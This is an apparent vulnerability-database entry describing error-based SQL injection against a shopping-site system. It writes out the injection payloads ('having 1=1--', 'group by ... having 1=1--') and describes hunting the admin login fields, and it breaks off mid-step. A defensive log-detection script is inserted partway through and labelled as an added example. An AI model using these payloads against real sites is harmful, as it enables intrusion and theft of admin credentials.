GOOGLE shopping site-building system injection vulnerability

2013-03-29T00:00:00
ID MYHACK58:62201338027
Type myhack58
Reporter Anonymous
Modified 2013-03-29T00:00:00

Description

Find an injection point

http://www.xxx.com/Diary_A.asp?UBID=&DCID=DC2012050610553697&DIID=DI2012050610583389

Out of habit, append ' having 1=1--

http://www.xxx.com.tw/Diary_A.asp?UBID=&DCID=DC2012050610553697&DIID=DI2012050610583389' having 1=1--


This revealed Diary_A.dl_Title (very excited at this point).

Then continue with

http://www.xxx.com.tw/Diary_A.asp?UBID=&DCID=DC2012050610553697&DIID=DI2012050610583389' group by dl_Title having 1=1--

Keep going the same way, revealing one field after another.

This revealed several fields and tables, but not the admin user fields that were needed.
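Seen from the defending side, the requests above leave a distinctive trail in web server logs. The following Python check is an added example, not part of the original write-up: it flags query strings in which a quote is followed by an optional GROUP BY list and a constant HAVING comparison, and summarizes them per client. The log layout, IP addresses and the column name col2 are constructed, and counting a 5xx status as a database error returned to the client is an assumption.

```python
import re
from collections import defaultdict
from urllib.parse import unquote_plus

# Constructed sample lines in a simplified "client method url status" layout.
SAMPLE_LOG = """\
203.0.113.7 GET /Diary_A.asp?UBID=&DCID=DC1&DIID=DI1 200
203.0.113.7 GET /Diary_A.asp?UBID=&DCID=DC1&DIID=DI1%27having+1=1-- 500
203.0.113.7 GET /Diary_A.asp?UBID=&DCID=DC1&DIID=DI1%27group%20by%20dl_Title%20having%201=1-- 500
203.0.113.7 GET /Diary_A.asp?UBID=&DCID=DC1&DIID=DI1'GROUP+BY+dl_Title,col2+HAVING+1=1-- 500
198.51.100.9 GET /search.asp?q=having+a+good+day 200
"""

# A quote closing the string literal, an optional GROUP BY column list,
# then a constant HAVING comparison such as 1=1.
PROBE = re.compile(
    r"['\u2019]\s*(?:group\s+by\s+(?P<cols>[\w.,\s]+?)\s+)?having\s+\d+\s*=\s*\d+",
    re.IGNORECASE,
)

def find_probes(log_text):
    """Return {client: {"hits", "errors", "columns"}} for requests matching PROBE."""
    report = defaultdict(lambda: {"hits": 0, "errors": 0, "columns": []})
    for line in log_text.splitlines():
        parts = line.split()
        if len(parts) != 4 or "?" not in parts[2]:
            continue
        client, _method, url, status = parts
        for _ in range(2):  # undo single and double URL-encoding
            url = unquote_plus(url)
        match = PROBE.search(url.split("?", 1)[1])
        if not match:
            continue
        entry = report[client]
        entry["hits"] += 1
        # Assumption: a 5xx reply means the database error reached the client.
        entry["errors"] += status.startswith("5")
        # Columns named in GROUP BY show how far the enumeration has progressed.
        for col in (match.group("cols") or "").split(","):
            col = col.strip()
            if col and col not in entry["columns"]:
                entry["columns"].append(col)
    return dict(report)

if __name__ == "__main__":
    for client, info in find_probes(SAMPLE_LOG).items():
        print(client, info)
```

A growing column list from one client together with repeated server errors indicates that detailed database errors are being returned to visitors; parameterized queries and generic error pages remove both the injection point and the disclosure.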

What to do? Go to the admin login page and look at its source code.


Input name="ADUID"

Input name="ADPWD"

Very lucky to find the fields, then continue to
